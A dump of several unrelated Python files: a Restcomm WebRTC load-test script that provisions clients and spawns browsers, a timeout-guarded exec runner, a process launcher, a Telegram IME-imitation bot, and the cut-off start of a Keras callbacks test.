DesiredCapabilities from selenium.webdriver.support import expected_conditions from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.common.by import By import selenium.common.exceptions # Globals # Version VERSION = "0.3.4" # TAG for console logs TAG = '[restcomm-test] ' # Keep the nodejs process in a global var so that we can reference it after the tests are over to shut it down httpProcess = None # Used in non-selenium runs browserProcesses = list() # restcomm test modes. 
Which parts of the tool do we want executed (bitmap): # - 001: Spawn webrtc browsers # - 010: Start HTTP server for external service & web app # - 100: Do Restcomm provisioning/unprovisioning testModes = None # Command line args args = None # list containing a dictionary for each webrtc client browser we are spawning clients = None # number of browsers spawned so far totalBrowserCount = 0 # log index logIndex = 0 def threadFunction(dictionary): try: print TAG + 'browser thread #' + str(dictionary['id']) + ' Running test for URL: ' + dictionary['url'] chromeOptions = Options() # important: don't request permission for media chromeOptions.add_argument("--use-fake-ui-for-media-stream") # enable browser logging caps = DesiredCapabilities.CHROME #caps['loggingPrefs'] = {'browser': 'ALL', 'client': 'ALL', 'driver': 'ALL', 'performance': 'ALL', 'server': 'ALL'} caps['loggingPrefs'] = { 'browser':'ALL' } #driver = webdriver.Chrome(chrome_options = chromeOptions, desired_capabilities = caps, service_args = ["--verbose", "--log-path=chrome.log"]) driver = webdriver.Chrome(chrome_options = chromeOptions, desired_capabilities = caps) # navigate to web page driver.get(dictionary['url']) #print driver.title #print 'Waiting for condition to be met' #WebDriverWait(driver, 30).until(expected_conditions.text_to_be_present_in_element((By.ID,'log'), 'Connection ended')) # this is actually a hack to keep the browser open for n seconds. Putting the thread to sleep doesn't work and so far I haven't found a nice way to do that in Selenium WebDriverWait(driver, 300).until(expected_conditions.text_to_be_present_in_element((By.ID,'log'), 'Non existing text')) except selenium.common.exceptions.TimeoutException as ex: print TAG + 'EXCEPTION: browser thread #' + str(dictionary['id']) + ' Test timed out' except: print TAG + 'EXCEPTION: browser thread #' + str(dictionary['id']) + ' Unexpected exception: ', sys.exc_info()[0] return # print messages print TAG + 'browser thread #' + str(dictionary['id']) + ' Saving the logs' logBuffer = '' for entry in driver.get_log('browser'): # entry is a dictionary logBuffer += json.dumps(entry, indent = 3) logFile = open('browser#' + str(dictionary['id']) + '.log', 'a') logFile.write(logBuffer) logFile.close() print TAG + 'browser thread #' + str(dictionary['id']) + ' Closing Driver' driver.close() def signalHandler(signal, frame): print('User interrupted testing with SIGINT; bailing out') stopServer() sys.exit(0) # take a url and break it in protocol and transport counterparts def breakUrl(url): matches = re.search('(^.*?:\/\/)(.*$)', url) protocol = matches.group(1) transport = matches.group(2) return protocol, transport # Return the account base Restcomm URL, like http://ACae6e420f425248d6a26948c17a9e2acf:0d01c95aac798602579fe08fc2461036@127.0.0.1:8080/restcomm/2012-04-24/Accounts/ACae6e420f425248d6a26948c17a9e2acf, # from base URL (i.e. http://127.0.0.1:8080), account sid and auth token def restBaseUrlFromCounterparts(accountSid, authToken, restcommUrl): # Need to break URL in protocol and transport parts so that we can put account sid and auth token in between matches = re.search('(^.*?:\/\/)(.*$)', restcommUrl) #protocol = matches.group(1) #transport = matches.group(2) protocol, transport = breakUrl(restcommUrl) return protocol + accountSid + ':' + authToken + '@' + transport + '/restcomm/2012-04-24/Accounts/' + accountSid # curl will break if we target an https server that has self signed certificate. 
Let's always use -k (avoid checks for cert) when targeting https def curlSecureOptionsIfApplicable(restcommUrl): protocol, transport = breakUrl(restcommUrl) if protocol == 'https://': return '-k' else: return '' # Provision Restcomm Number for external service via REST call def provisionPhoneNumber(phoneNumber, externalServiceUrl, accountSid, authToken, restcommUrl): print TAG + "Provisioning phone number " + phoneNumber + ' and linking it with Voice URL: ' + externalServiceUrl devnullFile = open(os.devnull, 'w') # Need to break URL in protocol and transport parts so that we can put account sid and auth token in between matches = re.search('(^.*?:\/\/)(.*$)', restcommUrl) protocol = matches.group(1) transport = matches.group(2) postData = { 'PhoneNumber': phoneNumber, 'VoiceUrl': externalServiceUrl, 'VoiceMethod': 'GET', 'FriendlyName': 'Load Testing App', 'isSIP' : 'true', } #cmd = 'curl -X POST ' + restBaseUrlFromCounterparts(accountSid, authToken, restcommUrl) + '/IncomingPhoneNumbers.json -d PhoneNumber=' + phoneNumber + ' -d VoiceUrl=' + externalServiceUrl + ' -d FriendlyName=LoadTestingApp -d isSIP=true' cmd = 'curl ' + curlSecureOptionsIfApplicable(restcommUrl) + ' -X POST ' + restBaseUrlFromCounterparts(accountSid, authToken, restcommUrl) + '/IncomingPhoneNumbers.json -d ' + urllib.urlencode(postData) print TAG + cmd #subprocess.call(cmd.split(), stdout = devnullFile, stderr = devnullFile) # remember this runs the command synchronously subprocess.call(cmd.split()) # Provision Restcomm Clients via REST call # count: number of Clients to provision # accountSid: Restcomm accountSid, like: ACae6e420f425248d6a26948c17a9e2acf # authToken: Restcomm authToken, like: 0a01c34aac72a432579fe08fc2461036 # restcommUrl: Restcomm URL, like: http://127.0.0.1:8080 def provisionClients(count, accountSid, authToken, restcommUrl, usernamePrefix, password): print TAG + "Provisioning " + str(count) + " Restcomm Clients" devnullFile = open(os.devnull, 'w') # Need to break URL in protocol and transport parts so that we can put account sid and auth token in between matches = re.search('(^.*?:\/\/)(.*$)', restcommUrl) protocol = matches.group(1) transport = matches.group(2) for i in range(1, count + 1): postData = { 'Login': usernamePrefix + str(i), 'Password': password, } #cmd = 'curl -X POST ' + restBaseUrlFromCounterparts(accountSid, authToken, restcommUrl) + '/Clients.json -d Login=user' + str(i) + ' -d Password=1234' cmd = 'curl ' + curlSecureOptionsIfApplicable(restcommUrl) + ' -X POST ' + restBaseUrlFromCounterparts(accountSid, authToken, restcommUrl) + '/Clients.json -d ' + urllib.urlencode(postData) #system(cmd) print TAG + cmd #subprocess.call(cmd.split(), stdout = devnullFile, stderr = devnullFile) subprocess.call(cmd.split()) def startServer(count, clientUrl, externalServiceUrl, usernamePrefix, clientWebAppDir, clientRole): print TAG + 'Starting http server to handle both http/https request for the webrtc-client web page, and RCML REST requests from Restcomm' externalServicePort = '80' externalServiceParsedUrl = urlparse.urlparse(externalServiceUrl); if externalServiceParsedUrl.port: externalServicePort = externalServiceParsedUrl.port webAppPort = '80' clientParsedUrl = urlparse.urlparse(clientUrl); if (clientParsedUrl.port): webAppPort = clientParsedUrl.port secureArg = '' if clientParsedUrl.scheme == 'https': secureArg = '--secure-web-app' # Make a copy of the current environment envDictionary = dict(os.environ) # Add the nodejs path, as it isn't found when we run as root 
envDictionary['NODE_PATH'] = '/usr/local/lib/node_modules' #cmd = 'server.js ' + str(count) + ' 10512 10510 10511' cmd = 'node http-server.js --client-count ' + str(count) + ' --external-service-port ' + str(externalServicePort) + ' --external-service-client-prefix ' + usernamePrefix + ' --web-app-port ' + str(webAppPort) + ' ' + secureArg + ' --web-app-dir ' + clientWebAppDir + ' --client-role ' + clientRole # We want it to run in the background #os.system(cmd) #subprocess.call(cmd.split(), env = envDictionary) #print "--- CMD: " + cmd global httpProcess httpProcess = subprocess.Popen(cmd.split(), env = envDictionary) #httpProcess = subprocess.Popen(cmd.split()) print TAG + 'PID for http server: ' + str(httpProcess.pid) # TODO: Not finished yet def unprovisionClients(count, accountSid, authToken, restcommUrl): print TAG + "(Not implemented yet) Unprovisioning " + str(count) + " Restcomm Clients" #for i in range(1, count + 1): # cmd = 'curl ' + curlSecureOptionsIfApplicable(restcommUrl) + ' -X DELETE http://' + accountSid + ':' + authToken + '@' + transport + '/restcomm/2012-04-24/Accounts/' + accountSid + '/Clients.json -d Login=user' + str(i) + ' -d Password=1234' # ... def stopServer(): if httpProcess: print TAG + 'Stopping http server' httpProcess.terminate() def globalSetup(dictionary): print TAG + "Setting up tests" global testModes # if user asked for restcomm provisioning/unprovisioning (i.e. testModes = 001 binary) if testModes & 1: # Provision Restcomm with the needed Clients provisionPhoneNumber(dictionary['phone-number'], dictionary['external-service-url'], dictionary['account-sid'], dictionary['auth-token'], dictionary['restcomm-base-url']) if dictionary['client-role'] == 'passive': # Provision Restcomm with the needed Clients only when in passive mode provisionClients(dictionary['count'], dictionary['account-sid'], dictionary['auth-token'], dictionary['restcomm-base-url'], dictionary['username-prefix'], dictionary['password']) # if user asked for http server to be started (i.e. testModes = 010 binary) if testModes & 2: # Start the unified server script to serve both RCML (REST) and html page for webrtc clients to connect to startServer(dictionary['count'], dictionary['client-url'], dictionary['external-service-url'], dictionary['username-prefix'], dictionary['client-web-app-dir'], dictionary['client-role']) def globalTeardown(dictionary): print TAG + "Tearing down tests" global testModes # if user asked for restcomm provisioning/unprovisioning (i.e. testModes = 001 binary) if testModes & 1: # Provision Restcomm with the needed Clients unprovisionClients(dictionary['count'], dictionary['account-sid'], dictionary['auth-token'], dictionary['restcomm-base-url']) # if user asked for http server to be started (i.e. 
testModes = 010 binary) if testModes & 2: # Start the unified server script to serve both RCML (REST) and html page for webrtc clients to connect to stopServer() # Check if a command exists def commandExists(cmd): for path in os.environ["PATH"].split(os.pathsep): path = path.strip('"') execFile = os.path.join(path, cmd) if os.path.isfile(execFile) and os.access(execFile, os.X_OK): return True return False # Check if a process is running def processRunning(cmd): output = subprocess.check_output('ps ax'.split()) for line in output.splitlines(): if re.search('Xvfb', line): return True return False # Spawn browsers for all 'clients' def spawnBrowsers(browserCommand, clients, totalBrowserCount, logIndex, headless, display, threaded): envDictionary = None cmdList = None #global totalBrowserCount #global logIndex #totalBrowserCount += len(clients) # TODO: we could make work both in Linux/Darwin but we need extra handling here #osName = subprocess.check_output(['uname']) if re.search('chrom', browserCommand, re.IGNORECASE): envDictionary = None # Make a copy of the current environment envDictionary = dict(os.environ) # Set the chrome log file #envDictionary['CHROME_LOG_FILE'] = 'browser#' + str(client['id']) + '.log' #envDictionary['CHROME_LOG_FILE'] = 'chrome.log.' + str(datetime.datetime.utcnow()).replace(' ', '.') envDictionary['CHROME_LOG_FILE'] = 'chrome.log.' + str(logIndex) #logIndex += 1 if headless: envDictionary['DISPLAY'] = display cmdList = [ browserCommand, #'--user-data-dir=' + str(client['id']), #'--incognito', #'--new-window', '--no-first-run', # even if it's the first time Chrome is starting up avoid showing the welcome message, which needs user intervention and causes issues on headless environment '--enable-logging', # enable logging at the specified file #'--vmodule=webrtc-client*', # not tested '--use-fake-ui-for-media-stream', # don't require user to grant permission for microphone and camera '--use-fake-device-for-media-stream', # don't use real microphone and camera for media, but generate fake media '--ignore-certificate-errors', # don't check server certificate for validity, again to avoid user intervention #'--process-per-tab', # not tested ] else: # Make a copy of the current environment envDictionary = None envDictionary = dict(os.environ) # Set the chrome log file #envDictionary['NSPR_LOG_FILE'] = 'browser#' + str(client['id']) + '.log' envDictionary['NSPR_LOG_FILE'] = 'firefox.log' # not sure why but this is the 'module' name for the web console and '5' to get all levels envDictionary['NSPR_LOG_MODULES'] = 'timestamp,textrun:5' #envDictionary['NSPR_LOG_MODULES'] = 'timestamp,all:3' if headless: envDictionary['DISPLAY'] = display # Firefox cmdList = [ browserCommand, '--jsconsole', # without this I'm not getting proper logs for some weird reason #'--args', #'--new-tab', #client['url'], ] # add all the links in the command after the options for client in clients: cmdList.append(client['url']) separator = ' ' print TAG + 'Spawning ' + str(len(clients)) + ' browsers (total: ' + str(totalBrowserCount) + '). 
Command: ' + separator.join(cmdList) devnullFile = open(os.devnull, 'w') # We want it to run in the background if threaded: subprocess.Popen(cmdList, env = envDictionary, stdout = devnullFile, stderr = devnullFile) else: browserProcess = subprocess.Popen(cmdList, env = envDictionary, stdout = devnullFile, stderr = devnullFile) # Define a handler for the respawn HTTP server class httpHandler(BaseHTTPRequestHandler): def do_GET(self): responseText = None if re.search('^/respawn-user.*', self.path) == None: self.send_response(501) responseText = 'Not Implemented, please use /respawn-user' else: self.send_response(200) # query string for the GET request qsDictionary = None if '?' in self.path: qsDictionary = urlparse.parse_qs(urlparse.urlparse(self.path).query) else: print '--- Not found ? in request' return print 'Received respawn request: ' + json.dumps(qsDictionary, indent = 3) global totalBrowserCount global logIndex # check which 'client' the request is for for client in clients: if client['id'] == qsDictionary['username'][0]: respawnClients = list() respawnClients.append(client) totalBrowserCount += len(respawnClients) spawnBrowserThread = Thread(target = spawnBrowsers, args = (args.clientBrowserExecutable, respawnClients, totalBrowserCount, logIndex, args.clientHeadless, args.clientHeadlessDisplay, False)) spawnBrowserThread.start() logIndex += 1 #spawnBrowsers(args.clientBrowserExecutable, respawnClients, totalBrowserCount, logIndex, args.clientHeadless, args.clientHeadlessDisplay, True) responseText = 'Spawning new browser with username: ' + qsDictionary['username'][0] self.send_header('Content-type', 'text/html') # Allow requests from any origin (CORS) self.send_header("Access-Control-Allow-Origin", self.headers.get('Origin')) self.end_headers() self.wfile.write(responseText) return # HTTP server listening for AJAX requests and spawning new browsers when existing browsers finish with the call and close def startRespawnServer(respawnUrl): respawnPort = '80' respawnParsedUrl = urlparse.urlparse(respawnUrl); if respawnParsedUrl.port: respawnPort = respawnParsedUrl.port print TAG + 'Starting respawn HTTP server at port: ' + str(respawnPort) httpd = None serverAddress = ('', respawnPort) httpd = HTTPServer(serverAddress, httpHandler) if respawnParsedUrl.scheme == 'https': httpd.socket = ssl.wrap_socket(httpd.socket, keyfile='cert/key.pem', certfile='cert/cert.pem', server_side=True) httpd.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) size = httpd.socket.getsockopt(SOL_SOCKET, SO_RCVBUF) print 'Socket recv buffer size: ' + str(size) httpd.socket.setsockopt(SOL_SOCKET, SO_RCVBUF, size * 2) newSize = httpd.socket.getsockopt(SOL_SOCKET, SO_RCVBUF) print 'Socket recv buffer size after set: ' + str(newSize) httpd.serve_forever() ## --------------- Main code --------------- ## parser = argparse.ArgumentParser() parser.add_argument('-c', '--client-count', dest = 'count', default = 10, type = int, help = 'Count of Webrtc clients spawned for the test') parser.add_argument('--client-url', dest = 'clientUrl', default = 'http://127.0.0.1:10510/webrtc-client.html', help = 'Webrtc clients target URL, like \'http://127.0.0.1:10510/webrtc-client.html\'') parser.add_argument('--client-web-app-dir', dest = 'clientWebAppDir', default = '.', help = 'Directory where the web app resides, so that our http server knows what to serve, like \'../webrtc-load-tests\'') parser.add_argument('--client-register-ws-url', dest = 'registerWsUrl', default = 'ws://127.0.0.1:5082', help = 'Webrtc clients target websocket URL 
for registering, like \'ws://127.0.0.1:5082\'') parser.add_argument('--client-register-domain', dest = 'registerDomain', default = '127.0.0.1', help = 'Webrtc clients domain for registering, like \'127.0.0.1\'') parser.add_argument('--client-username-prefix', dest = 'usernamePrefix', default = 'user', help = 'User prefix for the clients, like \'user\'') parser.add_argument('--client-password', dest = 'password', default = '1234', help = 'Password for the clients, like \'1234\'') parser.add_argument('--client-browser-executable', dest = 'clientBrowserExecutable', default = 'chromium-browser', help = 'Browser executable for the test. Can be full path (if not in PATH), like \'/Applications/Firefox.app/Contents/MacOS/firefox-bin\', \'/Applications/Google Chrome.app/Contents/MacOS/Google Chrome\' (for OSX) or just executable, like \'firefox\', \'chromium-browser\' (for GNU/Linux), default is \'chromium-browser\'') parser.add_argument('--client-headless', dest = 'clientHeadless', action = 'store_true', default = False, help = 'Should we use a headless browser?') parser.add_argument('--client-respawn', dest = 'respawn', action = 'store_true', default = False, help = 'Should we use respawn browser logic? This means a. starting an http server to listen for respawn requests (see --client-respawn-url) and b. tell the clients to close the tabs after done with the call scenario') parser.add_argument('--client-respawn-url', dest = 'respawnUrl', default = 'http://127.0.0.1:10511/respawn-user', help = 'Webrtc clients respawn URL to be notified when the call is over, like \'http://127.0.0.1:10511/respawn-user\'') parser.add_argument('--client-headless-x-display', dest = 'clientHeadlessDisplay', default = ':99', help = 'When using headless, which virtual X display to use when setting DISPLAY env variable. Default is \':99\'') parser.add_argument('--client-role', dest = 'clientRole', default = 'passive', help = 'Role for the client. When \'active\' it makes a call to \'--target-sip-uri\'. When \'passive\' it waits for incoming call. Default is \'passive\'') parser.add_argument('--client-target-uri', dest = 'clientTargetUri', default = '+1234@127.0.0.1', help = 'Client target URI when \'--client-role\' is \'active\' (it\'s actually a SIP URI without the \'sip:\' part. Default is \'+1234@127.0.0.1\'') parser.add_argument('--restcomm-base-url', dest = 'restcommBaseUrl', default = 'http://127.0.0.1:8080', help = 'Restcomm instance base URL, like \'http://127.0.0.1:8080\'') parser.add_argument('--restcomm-account-sid', dest = 'accountSid', required = True, help = 'Restcomm accound Sid, like \'ACae6e420f425248d6a26948c17a9e2acf\'') parser.add_argument('--restcomm-auth-token', dest = 'authToken', required = True, help = 'Restcomm auth token, like \'0a01c34aac72a432579fe08fc2461036\'') parser.add_argument('--restcomm-phone-number', dest = 'phoneNumber', default = '+5556', help = 'Restcomm phone number to provision and link with external service, like \'+5556\'') parser.add_argument('--restcomm-external-service-url', dest = 'externalServiceUrl', default = 'http://127.0.0.1:10512/rcml', help = 'External service URL for Restcomm to get RCML from, like \'http://127.0.0.1:10512/rcml\'') parser.add_argument('--test-modes', dest = 'testModes', default = 7, type = int, help = 'Testing modes for the load test. Which parts of the tool do we want to run? Provisioning, HTTP server, client browsers or any combination of those. This is a bitmap where binary 001 (i.e. 1) means to do provisioning unprovisioning, binary 010 (i.e. 
2) means start HTTP(S) server and binary 100 (i.e. 4) means to spawn webrtb browsers. Default is binary 111 (i.e. 7) which means to do all the above') parser.add_argument('--version', action = 'version', version = 'restcomm-test.py ' + VERSION) args = parser.parse_args() print TAG + 'Webrtc clients settings: \n\tcount: ' + str(args.count) + '\n\ttarget URL: ' + args.clientUrl + '\n\tregister websocket url: ' + args.registerWsUrl + '\n\tregister domain: ' + args.registerDomain + '\n\tusername prefix: ' + args.usernamePrefix + '\n\tpassword: ' + args.password + '\n\tbrowser executable: ' + args.clientBrowserExecutable + '\n\theadless: ' + str(args.clientHeadless) + '\n\theadless X display: ' + args.clientHeadlessDisplay + '\n\trespawn client browsers: ' + str(args.respawn) + '\n\trespawn url: ' + args.respawnUrl + '\n\tclient role: ' + args.clientRole + '\n\tclient target SIP URI: ' + args.clientTargetUri print TAG + 'Restcomm instance settings: \n\tbase URL: ' + args.restcommBaseUrl + '\n\taccount sid: ' + args.accountSid + '\n\tauth token: ' + args.authToken + '\n\tphone number: ' + args.phoneNumber + '\n\texternal service URL: ' + args.externalServiceUrl print TAG + 'Testing modes: ' + str(args.testModes) # assign to global to be able to use from functions testModes = args.testModes # Let's handle sigint so the if testing is interrupted we still cleanup signal.signal(signal.SIGINT, signalHandler) globalSetup({ 'count': args.count, 'client-url': args.clientUrl, 'username-prefix': args.usernamePrefix, 'password': args.password, 'account-sid': args.accountSid, 'auth-token': args.authToken, 'restcomm-base-url': args.restcommBaseUrl, 'phone-number': args.phoneNumber, 'external-service-url': args.externalServiceUrl, 'client-web-app-dir': args.clientWebAppDir, 'client-role': args.clientRole, }) # Populate a list with browser thread ids and URLs for each client thread that will be spawned clients = list() for i in range(1, args.count + 1): GETData = { 'username': args.usernamePrefix + str(i), 'password': args.password, 'register-ws-url': args.registerWsUrl, 'register-domain': args.registerDomain, 'fake-media': str(args.clientHeadless).lower(), 'role': args.clientRole, } if args.respawn: GETData['respawn-url'] = args.respawnUrl; GETData['close-on-end'] = 'true'; if args.clientRole == 'active': GETData['call-destination'] = args.clientTargetUri; clients.append({ 'id': GETData['username'], 'url' : args.clientUrl + '?' + urllib.urlencode(GETData) }) browserProcess = None # if user asked for browsers to be spawned (i.e. testModes = 100 binary) if testModes & 4: if args.clientHeadless: if not commandExists('Xvfb'): # Check if Xvfb exists print 'ERROR: Running in headless mode but Xvfb does not exist' stopServer() sys.exit(1) if not processRunning('Xvfb'): print 'ERROR: Running in headless mode but Xvfb is not running' stopServer() sys.exit(1) useSelenium = False; if useSelenium: print TAG + 'Spawning ' + str(args.count) + ' tester threads' # Make the Pool of workers pool = ThreadPool(args.count) # Open the urls in their own threads and return the results try: results = pool.map(threadFunction, clients) except: print TAG + 'EXCEPTION: pool.map() failed. 
Unexpected exception: ', sys.exc_info()[0] # Close the pool and wait for the work to finish pool.close() pool.join() else: # No selenium, spawn browsers manually (seems to scale better than selenium) #global totalBrowserCount #global logIndex # check which 'client' the request is for totalBrowserCount += len(clients) spawnBrowsers(args.clientBrowserExecutable, clients, totalBrowserCount, logIndex, args.clientHeadless, args.clientHeadlessDisplay, False) logIndex += 1 # Start the respawn server which monitors if browsers are closing after handling call scenario and creates new in their place so that load testing can carry on if args.respawn: startRespawnServer(args.respawnUrl) print TAG + 'Please start call scenarios. Press Ctrl-C to stop ...' # raw_input doesn't exist in 3.0 and inputString issues an error in 2.7 if (sys.version_info < (3, 0)): inputString = raw_input(TAG + 'Press any key to stop the test...\n') else: inputString = input(TAG + 'Press any key to stop the test...') # if user asked for browsers to be spawned (i.e. testModes = 100 binary) if testModes & 4: if not useSelenium: print TAG + "Stopping browser" browserProcess.kill() globalTeardown({ 'count': args.count, 'username': args.password, 'password': args.password, 'account-sid': args.accountSid, 'auth-token': args.authToken, 'restcomm-base-url': args.restcommBaseUrl, 'phone-number': args.phoneNumber, 'external-service-url': args.externalServiceUrl })
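The --test-modes flag above is a bitmap, and the checks testModes & 1, & 2 and & 4 in globalSetup and the main block select which parts of the tool run. The small decoder below mirrors those checks and the argparse help text (the header comment at the top of the file lists the bits in the opposite order); the constant and helper names are illustrative and not part of restcomm-test.py.

MODE_PROVISION = 1    # binary 001: provision/unprovision Restcomm clients and number
MODE_HTTP_SERVER = 2  # binary 010: start the HTTP(S) server for RCML and the web app
MODE_BROWSERS = 4     # binary 100: spawn the webrtc client browsers

def describe_test_modes(test_modes):
    parts = []
    if test_modes & MODE_PROVISION:
        parts.append('provisioning')
    if test_modes & MODE_HTTP_SERVER:
        parts.append('http server')
    if test_modes & MODE_BROWSERS:
        parts.append('browsers')
    return parts or ['nothing']

print(describe_test_modes(7))  # ['provisioning', 'http server', 'browsers']
print(describe_test_modes(6))  # ['http server', 'browsers']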
script.py
import io,os,sys,time,threading,ctypes,inspect,traceback

def _async_raise(tid, exctype):
    tid = ctypes.c_long(tid)
    if not inspect.isclass(exctype):
        exctype = type(exctype)
    res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exctype))
    if res == 0:
        raise ValueError("invalid thread id")
    elif res != 1:
        ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)
        raise SystemError("Timeout Exception")

def stop_thread(thread):
    _async_raise(thread.ident, SystemExit)

def text_thread_run(code):
    try:
        env = {}
        exec(code, env, env)
    except Exception as e:
        print(e)

# This is the code to run Text functions...
def mainTextCode(code):
    global thread1
    thread1 = threading.Thread(target=text_thread_run, args=(code,), daemon=True)
    thread1.start()
    timeout = 15  # change timeout settings in seconds here...
    thread1_start_time = time.time()
    while thread1.is_alive():
        if time.time() - thread1_start_time > timeout:
            stop_thread(thread1)
            raise TimeoutError
        time.sleep(1)
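A minimal usage sketch of the watchdog above, assuming the file is importable as a module named script (the module name is an assumption, not stated in the file). mainTextCode returns quietly when the snippet finishes in time, and raises TimeoutError after stop_thread injects SystemExit into a snippet that overruns the 15 second budget.

import script

# Finishes well inside the 15 second budget.
script.mainTextCode("print('hello from the sandboxed snippet')")

# An endless loop is interrupted by stop_thread() once the timeout passes.
try:
    script.mainTextCode("while True:\n    pass")
except TimeoutError:
    print("snippet exceeded the 15 second limit and was stopped")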
default.py
from multiprocessing import Process

from default_methods import *
from default_server import *
from default_sound import *

if __name__ == "__main__":
    server_thread = Process(target=start_server)
    server_thread.start()

    while input('Exit [yes/no]: ') != 'yes':
        continue

    server_thread.join()

# vim: tabstop=3 noexpandtab shiftwidth=3 softtabstop=3
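The companion modules default_methods, default_server and default_sound are not included in this dump, so the launcher above cannot run as-is. The stub below reproduces the same Process-based pattern with a stand-in start_server; unlike the original, it terminates the child before joining so the join cannot block on a server loop that never returns. All names besides Process are placeholders.

from multiprocessing import Process
import time

def start_server():
    # stand-in for the real server loop in default_server.py
    while True:
        time.sleep(1)

if __name__ == "__main__":
    server = Process(target=start_server, daemon=True)
    server.start()

    while input('Exit [yes/no]: ') != 'yes':
        continue

    server.terminate()
    server.join()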
brokenimebot.py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- ''' Broken IME bot - Imitate recently broken Telegram iOS IME support This program is free software. It comes without any warranty, to the extent permitted by applicable law. You can redistribute it and/or modify it under the terms of the Do What The Fuck You Want To Public License, Version 2, as published by Sam Hocevar. See http://www.wtfpl.net/ for more details. ''' import re import sys import time import json import queue import random import logging import requests import functools import threading import concurrent.futures import jieba import brokenime logging.basicConfig(stream=sys.stderr, format='%(asctime)s [%(name)s:%(levelname)s] %(message)s', level=logging.DEBUG if sys.argv[-1] == '-v' else logging.INFO) logger_botapi = logging.getLogger('botapi') executor = concurrent.futures.ThreadPoolExecutor(5) HSession = requests.Session() def fake_yubikey(prefix='cccccc'): alphabet = 'cbdefghijklnrtuv' return prefix + ''.join(random.choice(alphabet) for i in range(44 - len(prefix))) class AttrDict(dict): def __init__(self, *args, **kwargs): super(AttrDict, self).__init__(*args, **kwargs) self.__dict__ = self class BotAPIFailed(Exception): pass def async_func(func): @functools.wraps(func) def wrapped(*args, **kwargs): def func_noerr(*args, **kwargs): try: func(*args, **kwargs) except Exception: logger_botapi.exception('Async function failed.') executor.submit(func_noerr, *args, **kwargs) return wrapped def bot_api(method, **params): for att in range(3): try: req = HSession.get(('https://api.telegram.org/bot%s/' % CFG.apitoken) + method, params=params, timeout=45) retjson = req.content ret = json.loads(retjson.decode('utf-8')) break except Exception as ex: if att < 1: time.sleep((att + 1) * 2) else: raise ex if not ret['ok']: raise BotAPIFailed(repr(ret)) return ret['result'] @async_func def answer(inline_query_id, results, **kwargs): return bot_api('answerInlineQuery', inline_query_id=inline_query_id, results=json.dumps(results), **kwargs) def updatebotinfo(): global CFG d = bot_api('getMe') CFG['username'] = d.get('username') def getupdates(): global CFG while 1: try: updates = bot_api('getUpdates', offset=CFG['offset'], timeout=10) except Exception: logger_botapi.exception('Get updates failed.') continue if updates: #logger_botapi.debug('Messages coming: %r', updates) CFG['offset'] = updates[-1]["update_id"] + 1 for upd in updates: MSG_Q.put(upd) time.sleep(.2) def handle_api_update(d: dict): logger_botapi.debug('Update: %r' % d) try: if 'inline_query' in d: query = d['inline_query'] text = query['query'].strip() imeresult = brokenime.breakime(text) if imeresult: r = answer(query['id'], [{'type': 'article', 'id': str(time.time()), 'title': ret, 'input_message_content': {'message_text': ret}, 'description': desc} for desc, ret in imeresult]) logger_botapi.debug(r) logger_botapi.info('%s -> %s', text, imeresult) elif 'message' in d: msg = d['message'] if msg['chat']['type'] == 'private': imeresult = brokenime.breakime(msg.get('text', '').strip()) if imeresult: bot_api('sendMessage', chat_id=msg['chat']['id'], text=imeresult[0][1], reply_to_message_id=msg['message_id']) except Exception: logger_botapi.exception('Failed to process a message.') def load_config(): return AttrDict(json.load(open('config.json', encoding='utf-8'))) def save_config(): json.dump(CFG, open('config.json', 'w'), sort_keys=True, indent=1) if __name__ == '__main__': CFG = load_config() MSG_Q = queue.Queue() jieba.initialize() try: updatebotinfo() apithr = 
threading.Thread(target=getupdates)
        apithr.daemon = True
        apithr.start()
        while 1:
            handle_api_update(MSG_Q.get())
    finally:
        save_config()
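The bot's main loop above pairs a long-polling thread (getupdates, which advances CFG['offset'] so no update is handled twice) with a queue drained on the main thread. The self-contained sketch below shows just that producer/consumer structure; fetch_updates is a stand-in for the real getUpdates Bot API call, and none of these names come from brokenimebot.py.

import queue
import threading
import time

MSG_Q = queue.Queue()

def fetch_updates(offset):
    # stand-in: pretend the server has three updates, then nothing new
    pending = [{"update_id": i, "message": {"text": "msg %d" % i}} for i in range(3)]
    return [u for u in pending if u["update_id"] >= offset]

def poll_loop():
    offset = 0
    for _ in range(5):                               # a real bot loops forever
        updates = fetch_updates(offset)
        if updates:
            offset = updates[-1]["update_id"] + 1    # acknowledge what we've seen
            for upd in updates:
                MSG_Q.put(upd)
        time.sleep(0.2)

threading.Thread(target=poll_loop, daemon=True).start()
for _ in range(3):
    print("handling", MSG_Q.get()["message"]["text"])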
test_callbacks.py
import os import multiprocessing import numpy as np import pytest from csv import reader from csv import Sniffer import shutil from keras import optimizers from keras import initializers from keras import callbacks from keras.models import Sequential, Model from keras.layers import Input, Dense, Dropout, add from keras.layers.convolutional import Conv2D from keras.layers.pooling import MaxPooling2D, GlobalAveragePooling2D from keras.utils.test_utils import get_test_data from keras.utils.test_utils import keras_test from keras import backend as K from keras.utils import np_utils try: from unittest.mock import patch except: from mock import patch input_dim = 2 num_hidden = 4 num_classes = 2 batch_size = 5 train_samples = 20 test_samples = 20 @keras_test def test_TerminateOnNaN(): np.random.seed(1337) (X_train, y_train), (X_test, y_test) = get_test_data(num_train=train_samples, num_test=test_samples, input_shape=(input_dim,), classification=True, num_classes=num_classes) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) cbks = [callbacks.TerminateOnNaN()] model = Sequential() initializer = initializers.Constant(value=1e5) for _ in range(5): model.add(Dense(num_hidden, input_dim=input_dim, activation='relu', kernel_initializer=initializer)) model.add(Dense(num_classes, activation='linear')) model.compile(loss='mean_squared_error', optimizer='rmsprop') # case 1 fit history = model.fit(X_train, y_train, batch_size=batch_size, validation_data=(X_test, y_test), callbacks=cbks, epochs=20) loss = history.history['loss'] assert len(loss) == 1 assert loss[0] == np.inf # case 2 fit_generator def data_generator(): max_batch_index = len(X_train) // batch_size i = 0 while 1: yield (X_train[i * batch_size: (i + 1) * batch_size], y_train[i * batch_size: (i + 1) * batch_size]) i += 1 i = i % max_batch_index history = model.fit_generator(data_generator(), len(X_train), validation_data=(X_test, y_test), callbacks=cbks, epochs=20) loss = history.history['loss'] assert len(loss) == 1 assert loss[0] == np.inf or np.isnan(loss[0]) @keras_test def test_stop_training_csv(tmpdir): np.random.seed(1337) fp = str(tmpdir / 'test.csv') (X_train, y_train), (X_test, y_test) = 